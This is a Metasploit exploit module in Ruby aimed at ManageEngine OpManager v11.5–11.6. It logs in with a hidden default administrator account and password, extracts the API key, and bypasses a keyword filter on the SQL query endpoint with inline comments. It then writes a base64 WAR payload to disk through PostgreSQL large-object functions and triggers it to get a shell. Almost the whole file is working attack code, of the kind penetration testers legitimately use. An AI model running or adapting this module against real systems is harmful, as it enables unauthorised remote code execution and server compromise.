## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote # It removes large object in database, shoudn't be a problem, but just in case.... Rank = ManualRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => 'ManageEngine OpManager Remote Code Execution', 'Description' => %q{ This module exploits a default credential vulnerability in ManageEngine OpManager, where a default hidden account "IntegrationUser" with administrator privileges exists. The account has a default password of "plugin" which can not be reset through the user interface. By log-in and abusing the default administrator's SQL query functionality, it's possible to write a WAR payload to disk and trigger an automatic deployment of this payload. This module has been tested successfully on OpManager v11.5 and v11.6 for Windows. }, 'License' => MSF_LICENSE, 'Author' => [ 'xistence ' # Discovery, Metasploit module ], 'References' => [ [ 'EDB', '38174' ], ], 'Platform' => ['java'], 'Arch' => ARCH_JAVA, 'Targets' => [ ['ManageEngine OpManager v11.6', {}] ], 'Privileged' => false, 'DisclosureDate' => 'Sep 14 2015', 'DefaultTarget' => 0)) end def uri target_uri.path end def check # Check version vprint_status("#{peer} - Trying to detect ManageEngine OpManager") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'LoginPage.do') }) unless res && res.code == 200 return Exploit::CheckCode::Safe end if res.body =~ /OpManager.*v\.([0-9]+\.[0-9]+)<\/span>/ version = $1 if Gem::Version.new(version) <= Gem::Version.new('11.6') return Exploit::CheckCode::Appears else # Patch unknown return Exploit::CheckCode::Detected end elsif res.body =~ /OpManager/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def sql_query( key, query ) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'api', 'json', 'admin', 'SubmitQuery'), 'vars_get' => { 'apiKey' => key }, 'vars_post' => { 'query' => query } }) unless res && res.code == 200 fail_with(Failure::Unknown, "#{peer} - Query was not succesful!") end res end def exploit print_status("#{peer} - Access login page") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'jsp', 'Login.do'), 'vars_post' => { 'domainName' => 'NULL', 'authType' => 'localUserLogin', 'userName' => 'IntegrationUser', # Hidden user 'password' => 'plugin' # Password of hidden user } }) if res && res.code == 302 redirect = URI(res.headers['Location']).to_s.gsub(/#\//, "") print_status("#{peer} - Location is [ #{redirect} ]") else fail_with(Failure::Unknown, "#{peer} - Access to login page failed!") end # Follow redirection process print_status("#{peer} - Following redirection") res = send_request_cgi({ 'uri' => redirect, 'method' => 'GET' }) if res && res.code == 200 && res.body =~ /window.OPM.apiKey = "([a-z0-9]+)"/ api_key = $1 print_status("#{peer} - Retrieved API key [ #{api_key} ]") else fail_with(Failure::Unknown, "#{peer} - Redirect failed!") end app_base = rand_text_alphanumeric(4 + rand(32 - 4)) war_payload = payload.encoded_war({ :app_name => app_base }).to_s war_payload_base64 = Rex::Text.encode_base64(war_payload).gsub(/\n/, '') print_status("#{peer} - Executing SQL queries") # Remove large object in database, just in case it exists from previous exploit attempts sql = 'SELECT lo_unlink(-1)' sql_query(api_key, sql) # Create large object "-1". We use "-1" so we will not accidently overwrite large objects in use by other tasks. sql = 'SELECT lo_create(-1)' result = sql_query(api_key, sql) if result.body =~ /lo_create":([0-9]+)}/ lo_id = $1 else fail_with(Failure::Unknown, "#{peer} - Postgres Large Object ID not found!") end # Insert WAR payload into the pg_largeobject table. We have to use /**/ to bypass OpManager'sa checks for INSERT/UPDATE/DELETE, etc. sql = "INSERT/**/INTO pg_largeobject (loid,pageno,data) VALUES(#{lo_id}, 0, DECODE('#{war_payload_base64}', 'base64'))" sql_query(api_key, sql) # Export our large object id data into a WAR file sql = "SELECT lo_export(#{lo_id}, '..//..//tomcat//webapps//#{app_base}.war');" sql_query(api_key, sql) # Remove our large object in the database sql = 'SELECT lo_unlink(-1)' sql_query(api_key, sql) register_file_for_cleanup("tomcat//webapps//#{app_base}.war") register_file_for_cleanup("tomcat//webapps//#{app_base}") 10.times do select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war print_status("#{peer} - Attempting to launch payload in deployed WAR...") res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, app_base, "#{Rex::Text.rand_text_alpha(rand(8) + 8)}.jsp"), 'method' => 'GET' }) # Failure. The request timed out or the server went away. break if res.nil? # Success! Triggered the payload, should have a shell incoming break if res.code == 200 end end end